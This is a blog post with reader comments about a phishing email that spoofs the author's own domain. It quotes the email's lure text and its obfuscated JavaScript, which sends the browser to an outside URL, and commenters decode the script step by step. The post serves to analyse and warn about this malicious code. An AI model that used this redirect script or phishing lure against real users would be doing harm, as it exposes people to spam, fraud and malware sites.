dnull.com support to sokol
Dear Customer,
This e-mail was send by dnull.com to notify you that we have temporanly prevented access to your account.
We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.(C) dnull.com
Where it gets interesting is I own dnull.com and it's my server. How stupid can these guys be?Dear Customer,
This e-mail was send by dnull.com to notify you that we have temporanly prevented access to your account.
We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions.
I don't have time to decipher it.
Maybe someone here will take the time.
<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';<script>
8 comments:
I received the exact same thing. In fact, while trying to research this, I did a google search of the js code, and your blog was the only search result.
Hey,
I work in the IT department at my company, and we've received 4 of these emails so far, unfortunately I don't know what the java script does either, but the spam email is poorly written, lots of misspellings!
If you google the code, yours is the only site that comes up.
Same thing happened to me. I will really like to know what does this javascript does...
I think the misspelling are on purpose to stop spam filters from catching it.
It's one of the few junk mails getting past gmail.com spam filters.
I dissected the code just for fun. It goes to a page at mvblaw.com, which redirects to a Canadian Viagra site.
Enjoy.
> Anonymous said...
Please, can you share the code, what tools/techniques are you using to reverse engineer the javascripts.
just a quick at it shows it's downloading something or another from a remote site referenced by the "encoded" part of the script
Some of the bits are easy to see...
for instance--
hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, ''
is just a simple regex replace-- so do the replace yourself... and you get: http://mvblaw.com/z.htm
'lOovcvavtLi5o5n5' is location
'hqrteqfH' is href
the rest is just sorting out the javascript to see what each function leads to another and how they interact... I'd do it but my sons birthday is tonight and i need to leave in 2m roughly :P
There's a good post on StackOverflow.com explaining what's going on w/ the JavaScript.
Some of the hosts appear to be clean (I contacted mvblaw.com and lendermedia.com, where it appears that neither knew about the z.htm), others appear to have more malicious intent (askverniek.com and bonenberger.net).
The method is slightly different, but the outcome is virtually the same as what you wrote about in your other post. In my comment there, I made mention of a comment I wrote here w/ some links for explanation and for complaining.
Post a Comment